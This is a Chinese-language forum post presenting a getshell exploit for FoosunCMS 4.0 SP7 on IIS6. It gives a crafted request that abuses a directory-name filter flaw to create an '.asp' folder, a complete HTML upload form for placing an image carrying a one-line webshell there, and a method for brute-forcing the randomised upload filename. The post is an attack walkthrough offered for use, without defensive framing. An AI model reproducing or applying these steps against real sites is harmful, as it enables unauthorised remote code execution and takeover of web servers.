找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 787|回复: 0

风讯 4.0 SP7 getshell 0day漏洞

[复制链接]

34

主题

43

回帖

119

牛毛

一级牛人

积分
119
发表于 2009-7-22 11:12:46 | 显示全部楼层 |阅读模式 来自 黑龙江省哈尔滨市
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。
漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一
个.asp目录
首先注册个账号访问
http://www.bbb.com/User/CommPages/FolderImageList.asp?
f_UserNumber=061****3700&Type=AddFolder&Path=/userfiles/061****3700/aa
a.asp//&CurrPath=/userfiles/061****3700
其中这个061****3700是你的userid,登录了直接可以看到,建立一个.asp目录
因为风讯浏览目录的地方也过滤了.,所以建立的子目录进不去。本地构造表单

<form name="FileForm" method="post" enctype="multipart/form-data"  
action="http://www.bbb.com/User/Commpages/UpFileSave.asp?
Path=/userfiles/061****3700/aaa.asp">
    <input type="hidden" name="AutoReName" value="2"><br>
    <input type="hidden" name="Path"
value="/userfiles/061****3700/aaa.asp">
    <input type="file" size="20" name="File1">
    <input type="hidden" name="FilesNum" value="1">
    <input type="submit" id="BtnSubmit" name="Submit" value=" 确 定 ">
    <input type="reset" id="ResetForm" name="Submit3" value=" 重 填 ">
</form>
传个夹带一句话的图片上去
恶心的地方来了,传上去的文件名是日期+时间+5位随机数(可能是4位3位2位1
位,反正最大5位),这个我跟bink研究了半天,没有
此贴转载http://www.bugba.com
办法看到-_-,用管中窥豹有个暴力猜接上传路径的功能,先在正常目录里上传
个文件,卡一下本地跟远程的时间差,然后传到.asp
目录里,把秒数误差控制在3秒以内,开始跑吧~~然后自己该干嘛干嘛去,RP过关
的话几个小时内应该能出结果-_-
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-29 11:01 , Processed in 0.275883 second(s), 33 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表